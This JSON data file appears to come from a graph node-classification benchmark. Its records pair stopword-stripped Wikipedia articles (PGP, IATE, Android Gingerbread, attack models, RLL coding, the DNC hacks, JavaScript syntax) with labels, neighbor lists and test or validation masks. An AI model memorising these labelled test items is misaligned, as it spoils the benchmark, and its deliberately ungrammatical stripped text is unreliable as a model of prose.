claimed owner owner key trustworthy sign keys one level level 0 signature comparable web trust signature since validity key certified level 1 signature similar trust one certificate authority key signed level 1 able issue unlimited number level 0 signatures level 2 signature highly analogous trust assumption users must rely whenever use default certificate authority list like included web browsers allows owner key make keys certificate authorities pgp versions always included way cancel 'revoke identity certificates lost compromised private key require communication security retained user less equivalent certificate revocation lists centralised pki schemes recent pgp versions also supported certificate expiration dates problem correctly identifying public key belonging particular user unique pgp public key/private key cryptosystems problem even slightly different guises fully satisfactory solution known pgp original scheme least leaves decision whether use endorsement/vetting system user pki schemes requiring instead every certificate attested central certificate authority accepted correct best publicly available information known method allow person group break pgp encryption cryptographic computational means indeed 1995 cryptographer bruce schneier characterized early version closest 're likely get military-grade encryption early versions pgp found theoretical vulnerabilities current versions recommended addition protecting data transit network pgp encryption also used protect data long-term data storage disk files long-term storage options also known data rest i.e data stored transit cryptographic security pgp encryption depends assumption algorithms used unbreakable direct cryptanalysis current equipment techniques original version rsa algorithm used encrypt session keys rsa security depends upon one-way function nature mathematical integer factoring similarly symmetric key algorithm used pgp version 2 idea might point future found previously undetected cryptanalytic flaws specific instances current pgp idea insecurities exist publicly known current versions pgp added additional encryption algorithms cryptographic vulnerability varies algorithm used however none algorithms current use publicly known cryptanalytic weaknesses new versions pgp released periodically vulnerabilities fixed developers come light agency wanting read pgp messages would probably use easier means standard cryptanalysis e.g rubber-hose cryptanalysis black-bag cryptanalysis e.g installing form trojan horse keystroke logging software/hardware target computer capture encrypted keyrings passwords fbi already used attack pgp investigations however vulnerabilities apply pgp conventional encryption software 2003 incident involving seized psion pdas belonging members red brigade indicated neither italian police fbi able decrypt pgp-encrypted files stored second incident december 2006 see boucher involving us customs agents seized laptop pc allegedly contained child pornography indicates us government agencies find nearly impossible access pgp-encrypted files additionally magistrate judge ruling case november 2007 stated forcing suspect reveal pgp passphrase would violate fifth amendment rights i.e suspect constitutional right incriminate fifth amendment issue opened government appealed case federal district judge ordered defendant provide key evidence suggests 2007 british police investigators unable break pgp instead resorted using ripa legislation demand passwords/keys november 2009 british citizen convicted ripa legislation jailed nine months refusing provide police investigators encryption keys pgp-encrypted files pgp cryptosystem criticized complexity standard implementation low usability user interface including recognized figures cryptography research standard developed 90 uses ineffective serialization format storage keys encrypted data resulted signature-spamming attacks public keys prominent developers gnu privacy guard backwards compatibility openpgp standard results usage relatively weak default choice cryptographic primitives cast5 cipher cfb mode s2k password hashing standard also criticized leaking metadata usage long-term keys lack forward secrecy popular end-user implementations suffered various signature-striping cipher downgrade metadata leakage vulnerabilities attributed complexity standard phil zimmermann created first version pgp encryption 1991 name pretty good privacy inspired name grocery store ralph pretty good grocery featured radio host garrison keillor fictional town lake wobegon first version included symmetric-key algorithm zimmermann designed named bassomatic saturday night live sketch zimmermann long-time anti-nuclear activist created pgp encryption similarly inclined people might securely use bbss securely store messages files license required non-commercial use even nominal charge complete source code included copies posting june 5 2001 entitled pgp marks 10th anniversary zimmermann describes circumstances surrounding release pgp pgp found way onto internet rapidly acquired considerable following around world users supporters included dissidents totalitarian countries affecting letters zimmermann published included testimony us congress civil libertarians parts world see zimmermann published testimony various hearings 'free communications activists called cypherpunks provided publicity distribution decades later cryptoparty activists much via twitter shortly release pgp encryption found way outside united states february 1993 zimmermann became formal target criminal investigation us government munitions export without license cryptosystems using keys larger 40 bits considered munitions within definition us export regulations pgp never used keys smaller 128 bits qualified time penalties violation found guilty substantial several years investigation zimmermann closed without filing criminal charges anyone else zimmermann challenged regulations imaginative way published entire source code pgp hardback book via mit press distributed sold widely anybody wishing build copy pgp could cut covers separate pages scan using ocr program conceivably enter type-in program ocr software available creating set source code text files one could build application using freely available gnu compiler collection pgp would thus available anywhere world claimed principle simple export munitions —guns bombs planes software—was remains restricted export books protected first amendment question never tested court respect pgp cases addressing encryption software however two federal appeals courts established rule cryptographic software source code speech protected first amendment ninth circuit court appeals bernstein case sixth circuit court appeals junger case us export regulations regarding cryptography remain force liberalized substantially throughout late 1990s since 2000 compliance regulations also much easier pgp encryption longer meets definition non-exportable weapon exported internationally except seven specific countries list named groups individuals substantially us trade prohibited various us export controls turmoil zimmermann team worked new version pgp encryption called pgp 3 new version considerable security improvements including new certificate structure fixed small security flaws pgp 2.x certificates well permitting certificate include separate keys signing encryption furthermore experience patent export problems led eschew patents entirely pgp 3 introduced use cast-128 a.k.a cast5 symmetric key algorithm dsa elgamal asymmetric key algorithms unencumbered patents federal criminal investigation ended 1996 zimmermann team started company produce new versions pgp encryption merged viacrypt zimmermann sold commercial rights licensed rsa directly rsadsi changed name pgp incorporated newly combined viacrypt/pgp team started work new versions pgp encryption based pgp 3 system unlike pgp 2 exclusively command line program pgp 3 designed start software library allowing users work command line inside gui environment original agreement viacrypt zimmermann team viacrypt would even-numbered versions zimmermann odd-numbered versions viacrypt thus created new version based pgp 2 called pgp 4 remove confusion could pgp 3 successor pgp 4 pgp 3 renamed released pgp 5 may 1997 december 1997 pgp inc. acquired network associates inc. nai zimmermann pgp team became nai employees nai first company legal export strategy publishing source code nai pgp team added disk encryption desktop firewalls intrusion detection ipsec vpns pgp family export regulation liberalizations 2000 longer required publishing source nai stopped releasing source code early 2001 zimmermann left nai served chief cryptographer hush communications provide openpgp-based e-mail service hushmail also worked veridis companies october 2001 nai announced pgp assets sale suspending development pgp encryption remaining asset kept pgp e-business server original pgp commandline version february 2002 nai canceled support pgp products exception renamed commandline product nai formerly mcafee intel security mcafee continued sell support product name mcafee e-business server 2013 august 2002 several ex-pgp team members formed new company pgp corporation bought pgp assets except command line version nai new company funded rob theis doll capital management dcm terry garnett venrock associates pgp corporation supports existing pgp users honors nai support contracts zimmermann serves special advisor consultant pgp corporation well continuing run consulting company 2003 pgp corporation created new server-based product called pgp universal mid-2004 pgp corporation shipped command line version called pgp command line integrates pgp encryption platform applications 2005 pgp corporation made first acquisition—the german software company glück kanja technology ag pgp deutschland ag 2010 pgp corporation acquired hamburg-based certificate authority tc trustcenter parent company chosensecurity form pgp trustcenter division since 2002 purchase nai pgp assets pgp corporation offered worldwide pgp technical support offices draper utah offenbach germany tokyo japan april 29 2010 symantec corp. announced would acquire pgp 300 million intent integrating enterprise security group acquisition finalized announced public june 7 2010 source code pgp desktop 10 available peer review also 2010 intel corporation acquired mcafee 2013 mcafee e-business server transferred software diversified services sells supports develops name sds e-business server enterprise townsend security currently offers commercial version pgp ibm ibm z mainframe platforms townsend security partnered network associates 2000 create compatible version pgp ibm platform townsend security ported pgp 2008 time ibm z mainframe version pgp relies free z/os encryption facility utilizes hardware acceleration software diversified services also offers commercial version pgp sds e-business server ibm z mainframe may 2018 bug named efail discovered certain implementations pgp could reveal plaintext contents emails encrypted 2003 originally used primarily encrypting contents e-mail messages attachments desktop client pgp products diversified since 2002 set encryption applications managed optional central policy server pgp encryption applications include e-mail attachments digital signatures laptop full disk encryption file folder security protection im sessions batch file transfer encryption protection files folders stored network servers recently encrypted signed http request/responses means client-side enigform server-side mod openpgp module also wordpress plugin available called wp-enigform-authentication takes advantage session management features enigform mod_openpgp pgp desktop 9.x family includes pgp desktop email pgp whole disk encryption pgp netshare additionally number desktop bundles also available depending application products feature desktop e-mail digital signatures im security whole disk encryption file folder security encrypted self-extracting archives secure shredding deleted files capabilities licensed different ways depending features required pgp universal server 2.x management console handles centralized deployment security policy policy enforcement key management reporting used automated e-mail encryption gateway manages pgp desktop 9.x clients addition local keyserver pgp universal server works pgp public keyserver—called pgp global directory—to find recipient keys capability delivering e-mail securely recipient key found via secure https browser session pgp desktop 9.x managed pgp universal server 2.x first released 2005 pgp encryption applications based new proxy-based architecture newer versions pgp software eliminate use e-mail plug-ins insulate user changes desktop applications desktop server operations based security policies operate automated fashion pgp universal server automates creation management expiration keys sharing keys among pgp encryption applications symantec pgp platform undergone rename pgp desktop known symantec encryption desktop pgp universal server known symantec encryption management server current shipping versions symantec encryption desktop 10.3.0 windows mac os platforms symantec encryption server 3.3.2 also available pgp command line enables command line-based encryption signing information storage transfer backup well pgp support package blackberry enables rim blackberry devices enjoy sender-to-recipient messaging encryption new versions pgp applications use openpgp s/mime allowing communications user nist specified standard inside pgp inc. still concern patent issues rsadsi challenging continuation viacrypt rsa license newly merged firm company adopted informal internal standard called unencumbered pgp would use algorithm licensing difficulties pgp encryption importance worldwide many wanted write software would interoperate pgp 5 zimmermann became convinced open standard pgp encryption critical cryptographic community whole july 1997 pgp inc. proposed ietf standard called openpgp gave ietf permission use name openpgp describe new standard well program supported standard ietf accepted proposal started openpgp working group openpgp internet standards track active development many e-mail clients provide openpgp-compliant email security described rfc 3156 current specification rfc 4880 november 2007 successor rfc 2440 rfc 4880 specifies suite required algorithms consisting elgamal encryption dsa triple des sha-1 addition algorithms standard recommends rsa described pkcs 1 v1.5 encryption signing well aes-128 cast-128 idea beyond many algorithms supported standard extended support camellia cipher rfc 5581 2009 signing key exchange based elliptic curve cryptography ecc i.e ecdsa ecdh rfc 6637 2012 support ecc encryption added proposed rfc 4880bis 2014 free software foundation developed openpgp-compliant program called gnu privacy guard abbreviated gnupg gpg gnupg freely available together source code gnu general public license gpl maintained separately several graphical user interfaces guis interact gnupg library encryption decryption signing functions see kgpg seahorse macgpg several vendors also developed openpgp-compliant software development open source openpgp-compliant library openpgp.js written javascript allowed web-based applications use pgp encryption web browser several ios android openpgp-compliant applications ipgmail ios openkeychain android enable key generation encryption/decryption email files apple ios google android operating systems openpgp encryption ensure secure delivery files messages well provide verification created sent message using process called digital signing open source office suite libreoffice implemented document signing openpgp version 5.4.0 linux using openpgp communication requires participation sender recipient openpgp also used secure sensitive files 're stored vulnerable places like mobile devices cloud advancement cryptography parts pgp criticized dated october 2017 roca vulnerability announced affects rsa keys generated buggy infineon firmware used yubikey 4 tokens often used pgp many published pgp keys found susceptible yubico offers free replacement affected tokens",
    "neighbors": [
      513,
      2050,
      4100,
      517,
      10756,
      8202,
      9744,
      7199,
      10274,
      2083,
      4644,
      9764,
      3629,
      5179,
      2110,
      1086,
      9281,
      7238,
      10831,
      3161,
      1634,
      10850,
      10341,
      9318,
      11368,
      7794,
      5749,
      2168,
      10872,
      5254,
      8329,
      4746,
      2187,
      8331,
      5777,
      11418,
      9884,
      3742,
      10405,
      4268,
      7859,
      2228,
      5813,
      704,
      10442,
      10963,
      728,
      3805,
      5857,
      9451,
      2800,
      8436,
      251,
      5373,
      9983,
      8449,
      9986,
      5899,
      8459,
      5391,
      1297,
      1810,
      8978,
      3865,
      1315,
      11046,
      2354,
      3890,
      3382,
      5433,
      9548,
      11088,
      4435,
      3422,
      9569,
      3941,
      6519,
      3959,
      7040,
      3462,
      10631,
      1941,
      7073,
      5028,
      9640,
      9642,
      1456,
      10161,
      1978,
      11198,
      8640,
      7107,
      3018,
      6602,
      1496,
      8674,
      7139,
      6643,
      503
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8284,
    "label": 0,
    "text": "Interactive_Terminology_for_Europe:interactive terminology europe interactive terminology europe iate interinstitutional terminology database european union project launched 1999 objective creating web-based interface eu terminology resources make information easily available ensure standardisation throughout eu institutions used eu institutions agencies since summer 2004 public user interface released testing early 2007 officially opened 28 june 2007 new version released 7 november 2018 following full rebuild system state-of-the-art technologies latest software development standards best practices usability accessibility new look feel iate incorporated existing terminology databases eu ’ translation services one interinstitutional database containing approximately 1.4 million multilingual entries following legacy databases imported iate iate intended contain single entry per concept actually contains multiple entries many concepts entries consolidated number entries fallen approximately 1.4 million approximately 1.2 million despite addition many new entries new previously unrecorded concepts project partners european commission european parliament council european union european court justice european court auditors european economic social committee european committee regions european central bank european investment bank translation centre bodies european union iate web site administered eu translation centre luxembourg behalf project partners subject 'domains based eurovoc entire iate glossary database downloaded free zipped format multilanguage glossaries generated using free tool",
    "neighbors": [
      5140
    ],
    "mask": "Test"
  },
  {
    "node_id": 8285,
    "label": 2,
    "text": "Android_Gingerbread:android gingerbread android gingerbread seventh version android codename android mobile operating system developed google released december 2010 versions longer supported gingerbread release introduced support near field communication nfc —used mobile payment solutions—and session initiation protocol sip —used voip internet telephony gingerbread user interface refined many ways making easier master faster use power-efficient simplified color scheme black background gave vividness contrast notification bar menus user interface components improvements menus settings resulted easier navigation system control nexus smartphone released december 2010 first phone google nexus line ran gingerbread also first one line built-in nfc functionality statistics issued google indicate 0.3 android devices accessing google play run gingerbread new features introduced gingerbread include following",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      3100,
      9244,
      11294,
      10271,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8794,
      2658,
      8821,
      6263,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      1728,
      196,
      3269,
      3782,
      8907,
      2258,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      246,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      3948,
      7548,
      4995,
      9610,
      400,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      10674,
      2001,
      5078,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8286,
    "label": 4,
    "text": "Attack_model:attack model cryptanalysis attack models attack types classification cryptographic attacks specifying kind access cryptanalyst system attack attempting break encrypted message also known ciphertext generated system greater access cryptanalyst system useful information get utilize breaking cypher cryptography sending party uses cipher encrypt transform secret plaintext ciphertext sent insecure communication channel receiving party receiving party uses inverse cipher decrypt ciphertext obtain plaintext secret knowledge required apply inverse cipher ciphertext secret knowledge usually short number string called key cryptographic attack third party cryptanalyst analyzes ciphertext try break cipher read plaintext obtain key future enciphered messages read usually assumed encryption decryption algorithms public knowledge available cryptographer case modern ciphers published openly assumption called kerckhoffs principle common attack models different attack models used cryptographic primitives generally kind security systems examples attack models",
    "neighbors": [
      8674,
      9156,
      1797,
      4389,
      11241,
      3084,
      3629,
      11119,
      177,
      212,
      1941,
      10329
    ],
    "mask": "Test"
  },
  {
    "node_id": 8287,
    "label": 5,
    "text": "Run-length_limited:run-length limited run-length limited rll coding line coding technique used send arbitrary data communications channel bandwidth limits rll codes defined four main parameters n k first two n refer rate code remaining two specify minimal maximal k number zeroes consecutive ones used telecommunication storage systems move medium past fixed recording head specifically rll bounds length stretches runs repeated bits signal change runs long clock recovery difficult short high frequencies might attenuated communications channel modulating data rll reduces timing uncertainty decoding stored data would lead possible erroneous insertion removal bits reading data back mechanism ensures boundaries bits always accurately found preventing bit slip efficiently using media reliably store maximal amount data given space early disk drives used simple encoding schemes rll 0,1 fm code followed rll 1,3 mfm code widely used hard disk drives mid-1980s still used digital optical discs cd dvd md hi-md blu-ray higher density rll 2,7 rll 1,7 codes became de facto industry standard hard disks early 1990s hard disk drive information represented changes direction magnetic field disk magnetic media playback output proportional density flux transition computer information represented voltage wire voltage wire relation defined ground level would binary zero positive voltage wire relation ground represents binary one magnetic media hand always carries magnetic flux either north pole south pole order convert magnetic fields binary data encoding method must used translate two one simplest practical codes modified non-return-to-zero-inverted nrzi simply encodes 1 magnetic polarity transition also known flux reversal zero transition disk spinning constant rate bit given equal time period data window magnetic signal represents bit flux reversal occurs start window note older hard disks used one fixed length time data window whole disk modern disks complicated see zoned bit recording method quite simple playback output proportional density ones long run zeros means playback output simple example consider binary pattern 101 data window 1 ns one nanosecond one billionth second stored disk change followed change another change preceding magnetic polarity already positive resulting pattern might look like −−+ value 255 binary ones would written −+−+−+−+ +−+−+−+− zero byte would written ++++++++ −−−−−−−− 512 byte sector zeros would written 4,096 sequential bits polarity since disk drive physical piece hardware rotational speed drive change slightly due change motor speed thermal expansion disk platter physical media floppy disk also become deformed causing larger timing errors timing circuit controller may small variations speed problem long string zeros way disk drive controller know exact position read head thus way know exactly many zeros speed variation even 0.1 precise practical floppy drive could result four bits added removed 4,096 bit data stream without form synchronization error correction data would become completely unusable problem due limits magnetic media possible write many polarity changes certain amount space upper limit many 1 also written sequentially depends linear velocity head gap prevent problem data coded way long repetitions single binary value occur limiting number zeros written consecutively makes possible drive controller stay sync limiting number 1 written row overall frequency polarity changes reduced allowing drive store data amount space resulting either smaller package amount data storage size package codes used record magnetic disks limited length transition-free runs therefore characterized rll codes earliest simplest variants given specific names modified frequency modulation mfm name rll commonly used complex variants given specific names term technically applies first rll code used hard drives rll 2,7 developed ibm engineers first used commercially 1979 ibm 3370 dasd use 4300 series mainframe late 1980s pc hard disks began using rll proper i.e variants complex received proper names mfm rll codes found almost universal application optical disc recording practice since 1980 consumer electronics rlls like efm code rate=8/17 d=2 k=10 employed compact disc cd minidisc md efmplus code rate=8/16 d=2 k=10 used dvd parameters k minimum maximum allowed run-lengths coverage storage technologies references cited article useful generally run-length number bits signal remains unchanged run-length 3 bit 1 represents sequence '111 instance pattern magnetic polarizations disk might '+−−−−++−−−++++++ runs length 1 4 2 3 6 however run length limited coding terminology assumes nrzi encoding 1 bits indicate changes 0 bits indicate absence change sequence would expressed '11000101001000001 runs zero bits counted somewhat confusingly run length number zeros 0 3 1 2 5 preceding adjacent ones one less number bit times signal actually remains unchanged run length limited sequences characterized two parameters k stipulate minimum maximum zero-bit run length occur sequence rll codes generally specified k rll e.g 1,3 rll encoded format 1 bit indicates flux transition 0 indicates magnetic field disk change time interval generally term rll code used refer elaborate encodings original frequency modulation code also called differential manchester encoding seen simple rate-1/2 rll code added 1 bits referred clock bits example extending maximum run length 2 adjacent 0 bits data rate improved 4/5 original ibm group coded recording variant possible eleven 16 codes bit pattern codice_1 encoded prefixing complement codice_1 five cases would violate one rules codice_3 codice_4 code beginning 11 substituted codice_5 e ∨ example note meet definition 0,2 rll sufficient 5-bit code contain two consecutive zeros also necessary pair 5-bit codes combined sequentially contain two consecutive zeros must two zeros last one bit first code first one bit second code two arbitrarily chosen codes required rll code run length limits—0 2 case—apply overall modulated bitstream components represent discrete sequences plain data bits rule must hold arbitrary pair codes without exception input data may arbitrary sequence bits ibm gcr code meets condition since maximum run length zeros beginning 5-bit code one likewise maximum run length end code one making total run length two junction adjacent codes example maximum run length occurring codes seen example given code data 0010 ends zero code next data 1101 begins zero forming run two zeros junction two 5-bit codes modified frequency modulation begins get interesting special properties allow bits written magnetic medium twice density arbitrary bit stream limit close time flux transitions reading equipment detect constrains closely bits recorded medium worst case arbitrary bit stream two consecutive 1 produces two consecutive flux transitions time bits must spaced far enough apart would sufficient time flux transitions reader detect code imposes constraint =1 i.e minimum one 0 two 1 means worst case flux transitions two bit times apart bits twice close together arbitrary bit stream without exceeding reader capabilities doubled recording density compensates 1/2 coding rate code takes two bits represent one bit real information makes equivalent rate-1 code x complement previous encoded bit also previous data bit except clock bits—that x bit 0 01 code—this fm table code gets name inserted clock bits 0 except two 0 data bits example 1,7 rll maps 2 bits data onto three bits disk encoding done two four bit groups encoding rules x becomes x x except x 0 0 becomes x x 0 0 0 encoding according table longest last table match must used exceptions handle situations applying earlier rules would lead violation code constraints example 2,7 rll rate- code mapping n bits data onto 2 n bits disk like mfm minimum run length 50 longer three bit times instead two bits written faster achieving 50 higher effective data density encoding done two three four bit groups western digital wd5010a wd5011a wd50c12 seagate st11r ibm encoded forms begin four end three zero bits giving maximum run length seven example also alternate 1,7 rll encoding sometimes used avoid dc bias helps sending signal long distance types recording media x complement previous encoded bit i.e 1 previous bit 0 0 previous bit 1 example hhh 1,13 code rate-2/3 code developed three ibm researchers hirt hassner heise use 16 mb/s irda vfir physical layer unlike magnetic encoding designed infrared transmitter 0 bit represents 1 bit represents 1 bits consume power transmit designed limit density 1 bits less 50 particular 1,13|5 rll code final 5 indicates additional constraint 5 consecutive 10 bit pairs first eight rows describe standard 1,7 -rll code additional six exceptions increase maximum run zeros 13 legal pattern 100 000 000 000 001 represents 10 11 10 11 followed 01 limit maximum average ones density longest run 1–0 pairs 000 101 010 101 000 code limits ones density average 25.8 example let us encode bit sequence 10110010 different encodings suppose magnetic tape contain 3,200 flux reversals per inch modified frequency modulation 1,3 rll encoding stores data bit two bits tape since guaranteed one 0 non flux reversal bit 1 flux reversal bits possible store 6,400 encoded bits per inch tape 3,200 data bits per inch 1,7 rll encoding also store 6,400 encoded bits per inch tape since takes 3 encoded bits store 2 data bits 4,267 data bits per inch 2,7 rll encoding takes 2 encoded bits store data bit since guaranteed two 0 bits 1 bits possible store 9,600 encoded bits per inch tape 4,800 data bits per inch flux reversal densities hard drives significantly greater improvements storage density seen using different encoding systems",
    "neighbors": [
      7400,
      2989,
      2159,
      6129,
      2968,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8288,
    "label": 4,
    "text": "Democratic_National_Committee_cyber_attacks:democratic national committee cyber attacks democratic national committee cyber attacks took place 2015 2016 computer hackers infiltrated democratic national committee dnc computer network leading data breach cybersecurity experts well u.s. government stated cyberespionage work russian intelligence agencies forensic evidence analyzed several cybersecurity firms crowdstrike fidelis mandiant fireeye strongly indicates two russian intelligence agencies infiltrated dnc computer systems american cybersecurity firm crowdstrike removed hacking programs revealed history encounters groups already named calling one cozy bear fancy bear names used media december 9 2016 cia told u.s. legislators u.s. intelligence community concluded russia conducted cyberattacks operations 2016 u.s. election assist donald trump winning presidency multiple u.s. intelligence agencies concluded specific individuals tied russian government provided wikileaks stolen emails dnc well stolen emails hillary clinton campaign chairman also target cyberattack intelligence organizations additionally concluded russia hacked republican national committee r.n.c well d.n.c. chose leak information obtained r.n.c cyber attacks successfully penetrated dnc computing system began 2015 attacks cozy bear began summer 2015 attacks fancy bear began april 2016 fancy bear group began activities compromised system became apparent groups presumed spying communications stealing opposition research donald trump well reading email chats finally identified crowdstrike may 2016 groups intruders successfully expelled dnc systems within hours detection attacks considered part group recent attacks targeting u.s. government departments several political organizations including 2016 campaign organizations july 22 2016 person entity going moniker guccifer 2.0 claimed wordpress-hosted blog acting alone hacking dnc also claimed send significant amounts stolen electronic dnc documents wikileaks wikileaks revealed source leaked emails however cybersecurity experts firms including crowdstrike fidelis cybersecurity mandiant secureworks threatconnect editor ars technica rejected claims guccifer 2.0 determined basis substantial evidence cyberattacks committed two russian state-sponsored groups cozy bear fancy bear according separate reports new york times washington post u.s. intelligence agencies concluded high confidence russian government behind theft emails documents dnc u.s. intelligence community concluded russia behind cyberattack intelligence officials told washington post reached conclusion passed emails wikileaks know whether russian officials directed leak number experts cybersecurity analysts believe guccifer 2.0 probably russian government disinformation cover story distract attention away dnc breach two russian intelligence agencies president obama russian president vladimir putin discussion computer security issues took place side segment then-ongoing g20 summit china september 2016 obama said russian hacking stopped warning putin joint statement october 7 2016 united states department homeland security office director national intelligence stated us intelligence community confident russian government directed breaches release obtained allegedly obtained material attempt … interfere us election process common among russian intelligence services groups used similar hacking tools strategies believed neither group aware although antithetical american computer intelligence methods fear undermining defeating intelligence operations common practice russian intelligence community since 2004 intrusion part several attacks attempting access information american political organizations including 2016 u.s. presidential campaigns cozy bear fancy bear known adversaries extensively engaged political economic espionage benefits russian federation government believed connected russian intelligence services also access resources demonstrate levels proficiency matching nation-state capabilities cozy bear past year infiltrated unclassified computer systems white house u.s. state department u.s. joint chiefs staff according crowdstrike targeted sectors include defense energy mining financial insurance legal manufacturing media think tanks pharmaceutical research technology industries well universities cozy bear observed attacks occurred western europe brazil china japan mexico new zealand south korea turkey central asia fancy bear operating since mid-2000s crowdstrike reported targeting included aerospace defense energy government media industries fancy bear intrusions occurred united states western europe brazil canada china republic georgia iran japan malaysia south korea targeted defense ministries military organizations parallel russian federation government interests may indicate affiliation main intelligence directorate gru russian military intelligence service specifically fancy bear linked intrusions german bundestag france ’ tv5 monde television station april 2015 secureworks cybersecurity firm headquartered united states concluded march 2015 may 2016 fancy bear target list included merely dnc tens thousands foes putin kremlin united states ukraine russia georgia syria handful republicans targeted however january 25 2018 dutch newspaper de volkskrant tv program nieuwsuur reported 2014 dutch intelligence agency general intelligence security service aivd successfully infiltrated computers cozy bear observed hacking head office dnc subsequently white house first alert national security agency cyber-intrusion cozy bear access dnc systems since summer 2015 fancy bear since april 2016 evidence collaboration knowledge presence within system rather two russian espionage groups compromised systems engaged separately theft identical credentials cozy bear employed sea daddy implant obfuscated powershell script backdoor launching malicious code various times various dnc systems fancy bear employed x agent malware enabled distant command execution transmissions files keylogging well x-tunnel malware dnc leaders became aware compromise april 2016 attacks broadly reflect russian government interest u.s. political system well political leaders policies tendencies proclivities assessing possible beneficial outcomes attacks also broadly reflect russian government interest strategies policies practices u.s. government also globally reflects foreign governments interest ascertaining information donald trump new entry u.s. political leadership roles contrast information likely garnered decades pertaining clintons dnc commissioned cybersecurity company crowdstrike defeat intrusions chief technology officer dmitri alperovitch also cybersecurity expert stated cybersecurity firms fidelis cybersecurity fireeye independently reviewed malware came conclusion crowdstrike—that expert russian hacking groups responsible breach november 2017 us authorities identified 6 russian individuals conducted hack beginning december 2016 russian government arrested sergei mikhailov high ranking government cyber-spy ruslan stoyanov private sector cyber-security expert georgy fomchenkov former government cyber-spy dmitry dokuchaev mikhailov associate charged aiding u.s. intelligence agencies new york times associated dnc hacking although dnc claimed personal financial donor information accessed guccifer 2.0 leaked claimed donor lists detailing dnc campaign contributions gawker smoking gun however information authenticated doubts remain guccifer 2.0 backstory june 2016 person person claimed hacker hacked dnc servers published stolen documents online guccifer 2.0 later also claimed leaked 20.000 emails wikileaks u.s. intelligence community tasked resources debating putin chose summer 2016 escalate active measures influencing u.s. politics director national intelligence james r. clapper said 2011–13 russian protests putin confidence viability politician damaged putin responded propaganda operation former cia officer patrick skinner explained goal spread uncertainty u.s congressman adam schiff ranking member house permanent select committee intelligence commented putin aims said u.s. intelligence agencies concerned russian propaganda speaking disinformation appeared hungary slovakia czech republic poland schiff said increase behavior u.s. schiff concluded russian propaganda operations would continue u.s. election december 9 2016 cia told u.s. legislators u.s. intelligence community concluded russia conducted operations 2016 u.s. election assist donald trump winning presidency multiple u.s intelligence agencies concluded people specific individuals tied russian government gave wikileaks hacked emails democratic national committee d.n.c additional sources john podesta campaign chairman hillary clinton intelligence organizations additionally concluded russia hacked republican national committee r.n.c well d.n.c.—and chose leak information obtained r.n.c cia said foreign intelligence agents russian operatives previously known u.s. cia officials told u.s senators quite clear russia intentions help trump trump released statement december 9 disregarded cia conclusions members u.s. senate intelligence committee traveled ukraine poland 2016 learned russian operations influence affairs u.s senator angus king told portland press herald tactics used russia 2016 u.s. election analogous used countries 30 november 2016 king joined letter seven members u.s. senate intelligence committee asked president obama publicize information intelligence community russia role u.s. election interview cnn senator king warned ignoring problem saying bipartisan issue representatives u.s. congress took action monitor national security united states advancing legislation monitor propaganda 30 november 2016 legislators approved measure within national defense authorization act ask u.s. state department act propaganda inter-agency panel legislation authorized funding 160 million two-year-period initiative developed bipartisan bill countering foreign propaganda disinformation act written u.s senators republican rob portman democrat chris murphy portman urged u.s. government action counter propaganda murphy said election apparent u.s. needed additional tactics fight russian propaganda u.s. senate intelligence committee member ron wyden said frustration covert russian propaganda bipartisan republican u.s senators stated planned hold hearings investigate russian influence 2016 u.s. elections went preference incoming republican president-elect donald trump downplayed potential russian meddling election u.s. senate armed services committee chairman john mccain u.s. senate intelligence committee chairman richard burr discussed plans collaboration investigations russian cyberwarfare election u.s. senate foreign relations committee chairman bob corker planned 2017 investigation senator lindsey graham indicated would conduct sweeping investigation 115th congress december 9 2016 president obama ordered entire united states intelligence community conduct investigation russia attempts influence 2016 u.s. election — provide report left office january 20 2017 lisa monaco u.s homeland security advisor chief counterterrorism advisor president announced study said intrusion foreign nation u.s. national election unprecedented event would necessitate investigation subsequent administrations executive branch intelligence analysis take account data last three presidential elections u.s evidence showed malicious cyberwarfare 2008 2016 u.s. elections",
    "neighbors": [
      1024,
      5636,
      10252,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      4703,
      8292,
      2158,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      176,
      9904,
      9395,
      8886,
      3789,
      7887,
      4304,
      4314,
      9435,
      4830,
      3807,
      1251,
      5349,
      1254,
      10477,
      3825,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      6960,
      1337,
      11577,
      6484,
      857,
      1882,
      7515,
      4956,
      1886,
      3956,
      9082,
      11146,
      6031,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      5563,
      9664,
      8133,
      4054,
      7639,
      8664,
      9688,
      1504,
      9186,
      2542,
      507,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8289,
    "label": 9,
    "text": "JavaScript_syntax:javascript syntax syntax javascript set rules define correctly structured javascript program examples make use log function console object present browsers standard text output javascript standard library lacks official standard text output function given javascript mainly used client-side scripting within modern web browsers almost web browsers provide alert function alert also used commonly used brendan eich summarized ancestry syntax first paragraph javascript 1.1 specification follows javascript case sensitive common start name constructor capitalised letter name function variable lower-case letter example var a=5 console.log // 5 console.log // throws referenceerror defined spaces tabs newlines used outside string constants called whitespace unlike c whitespace javascript source directly impact semantics technique called automatic semicolon insertion asi statements well formed newline parsed considered complete semicolon inserted prior newline authorities advise supplying statement-terminating semicolons explicitly may lessen unintended effects automatic semicolon insertion two issues five tokens either begin statement extension complete statement five restricted productions line breaks allowed certain positions potentially yielding incorrect parsing five problematic tokens open parenthesis open bracket slash plus minus open parenthesis common immediately-invoked function expression pattern open bracket occurs sometimes others quite rare example given spec b c // treated // b c e .foo suggestion preceding statement terminated 